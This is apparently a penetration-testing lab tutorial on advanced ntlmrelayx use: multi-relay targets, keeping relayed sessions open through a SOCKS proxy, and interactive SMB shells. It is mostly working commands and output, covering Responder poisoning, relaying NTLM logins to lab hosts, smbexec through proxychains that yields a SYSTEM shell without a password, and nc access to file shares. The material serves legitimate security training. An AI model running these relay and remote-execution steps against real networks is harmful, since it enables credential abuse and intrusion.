Advanced ntlmrelayx usage
Beyond the basic NTLM relay over SMB scenario, ntlmrelayx offers several more advanced techniques.
1. Multi-relay
The multi-relay feature lets us:
- identify the user whose NTLM authentication we receive (so we can decide whether to relay that authentication or not)
- relay a single NTLM authentication (connection) to multiple targets
ntlmrelayx implements multi-relay by letting the client authenticate locally against the attacker machine, obtaining/extracting its identity from that authentication, and then forcing the client to re-authenticate so that each new authentication can be relayed to another target server.
This behaviour is enabled by default on ntlmrelayx's HTTP and SMB servers. To disable it, use the --no-multirelay option (one incoming connection is then used for only one attack).
1.1. Target definition
Because of the multi-relay feature, targets are divided into named targets and general targets: a named target specifies an identity, a general target does not. Targets are defined in URI form, with a syntax made of three components: scheme://authority/path
- scheme: defines the target protocol (for example http or ldap); if omitted, smb is used by default. The wildcard keyword all makes ntlmrelayx use every protocol it supports.
- authority: has the format DOMAIN\username@host:port. General targets do not use the DOMAIN\username part; only named targets do.
- path: optional, only needed for specific attacks, for example when a redirected HTTP NTLM authentication is used to reach a restricted web endpoint (such as ADCS).
When attacking a single general target, the HTTP and SMB servers do not enable multi-relay by default. Depending on the target type, ntlmrelayx's default multi-relay setting is as follows:
| Target type | Example | Multi-relay default |
|---|---|---|
| Single general target | -t 172.16.117.50 | Disabled |
| Single named target | -t smb://INLANEFREIGHT\PETER@172.16.117.50 | Enabled |
| Multiple targets | -tf relayTargets.txt | Enabled |
```bash
# Relay only the first NTLM authentication received (1:1 relationship)
ntlmrelayx.py -t smb://172.16.117.50
# Relay every connection belonging to the specific user PETER (M:M relationship)
ntlmrelayx.py -t smb://INLANEFREIGHT\\PETER@172.16.117.50
# With -tf, every received connection is relayed even for general targets (M:M relationship)
ntlmrelayx.py -tf relayTargets.txt
# Target a specific user but abuse only the first successfully captured connection
ntlmrelayx.py -t smb://INLANEFREIGHT\\PETER@172.16.117.50 --no-multirelay
```
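To make the target syntax and the defaults in the table concrete, here is an added Python illustration (not impacket's own target parser) that splits a target URI into scheme, DOMAIN\user, host, port and path, classifies it as named or general, reads a -tf-style file, and applies the multi-relay defaults; the scheme set and the sample hostnames are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added illustration of the syntax scheme://authority/path with
# authority = [DOMAIN\user@]host[:port]; NOT impacket's own parser.
# Assumption: only the schemes the text names plus the 'all' wildcard.
KNOWN_SCHEMES = {"smb", "http", "https", "ldap", "ldaps", "all"}

@dataclass
class Target:
    scheme: str
    domain: Optional[str]
    user: Optional[str]
    host: str
    port: Optional[int]
    path: Optional[str]

    @property
    def named(self) -> bool:
        # A named target carries DOMAIN\user in its authority; a general one does not.
        return self.user is not None

_TARGET_RE = re.compile(
    r"^(?:(?P<scheme>[A-Za-z]+)://)?"                  # optional scheme, default smb
    r"(?:(?P<domain>[^\\/@:]+)\\(?P<user>[^@/]+)@)?"   # optional DOMAIN\user@
    r"(?P<host>[^:/]+)(?::(?P<port>\d+))?"             # host[:port]
    r"(?P<path>/.*)?$"                                 # optional path (e.g. an ADCS web endpoint)
)

def parse_target(uri: str) -> Target:
    m = _TARGET_RE.match(uri.strip())
    if not m:
        raise ValueError(f"unparseable target: {uri!r}")
    scheme = (m.group("scheme") or "smb").lower()
    if scheme not in KNOWN_SCHEMES:
        raise ValueError(f"unknown scheme: {scheme}")
    port = int(m.group("port")) if m.group("port") else None
    return Target(scheme, m.group("domain"), m.group("user"), m.group("host"), port, m.group("path"))

def parse_target_file(text: str) -> List[Target]:
    # One target per line, as in a -tf file; blank lines and '#' comments are skipped.
    return [parse_target(l) for l in text.splitlines() if l.strip() and not l.lstrip().startswith("#")]

def multirelay_enabled(targets: List[Target], no_multirelay: bool = False) -> bool:
    # Defaults from the table: a single general target -> disabled; a single named
    # target or several targets -> enabled; --no-multirelay always disables it.
    if no_multirelay or not targets:
        return False
    return len(targets) > 1 or targets[0].named
```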
2. SOCKS connections
The -socks option makes ntlmrelayx start a proxy that keeps the relayed, authenticated sessions open and alive so other tools can use them afterwards; combined with -tf it can hold SOCKS sessions to several targets.
First, run ntlmrelayx with the -socks option
```
ntlmrelayx.py -tf relayTargets.txt -smb2support -socks
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
```
Then start poisoning with Responder
```
python3 Responder.py -I ens192
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
```
We then see ntlmrelayx relaying the NTLM authentication of several users coming from different IPs, establishing authenticated sessions on 172.16.117.50 and 172.16.117.60, and adding them to its SOCKS server
```
ntlmrelayx.py -tf relayTargets.txt -smb2support -socks
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/RMONTY SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/RMONTY@172.16.117.50(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/RMONTY SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/RMONTY@172.16.117.60(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, but there are no more targets left!
[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/PETER@172.16.117.50(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/PETER@172.16.117.60(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/NPORTS@172.16.117.50(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/NPORTS@172.16.117.60(445) to active SOCKS connection. Enjoy
```
The -socks option also enables a command-line interface inside ntlmrelayx; type help to see the available commands
```
ntlmrelayx> help
Documented commands (type help <topic>):
========================================
help  socks
Undocumented commands:
======================
EOF  exit  finished_attacks  startservers  stopservers  targets
```
The socks command lists the active sessions:
```
ntlmrelayx> socks
Protocol  Target         Username              AdminStatus  Port
--------  -------------  --------------------  -----------  ----
SMB       172.16.117.50  INLANEFREIGHT/RMONTY  FALSE        445
SMB       172.16.117.50  INLANEFREIGHT/PETER   TRUE         445
SMB       172.16.117.50  INLANEFREIGHT/NPORTS  FALSE        445
SMB       172.16.117.60  INLANEFREIGHT/RMONTY  FALSE        445
SMB       172.16.117.60  INLANEFREIGHT/PETER   FALSE        445
SMB       172.16.117.60  INLANEFREIGHT/NPORTS  FALSE        445
```
All of these sessions can be used through proxychains, configured as socks4 127.0.0.1 1080; the AdminStatus column also tells us which sessions have administrative rights on the target.
We can then try to connect (no password needed, since the relayed session is reused)
```
proxychains4 -q smbexec.py INLANEFREIGHT/PETER@172.16.117.50 -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
```
3. Interactive SMB client shell
With the --interactive / -i option we can have ntlmrelayx start an SMB client shell for every authenticated session it establishes
```
ntlmrelayx.py -tf relayTargets.txt -smb2support -i
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/RMONTY SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/RMONTY SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11001
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11002
[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11003
<SNIP>
```
ntlmrelayx starts an interactive SMB client shell for every authenticated session on the relay targets; we can connect to them with nc (note that these sessions are one-shot: once the connection is closed, the session is gone)
```
nc -nv 127.0.0.1 11000
Connection to 127.0.0.1 11000 port [tcp/*] succeeded!
Type help for list of commands
# shares
ADMIN$
C$
Finance
IPC$
```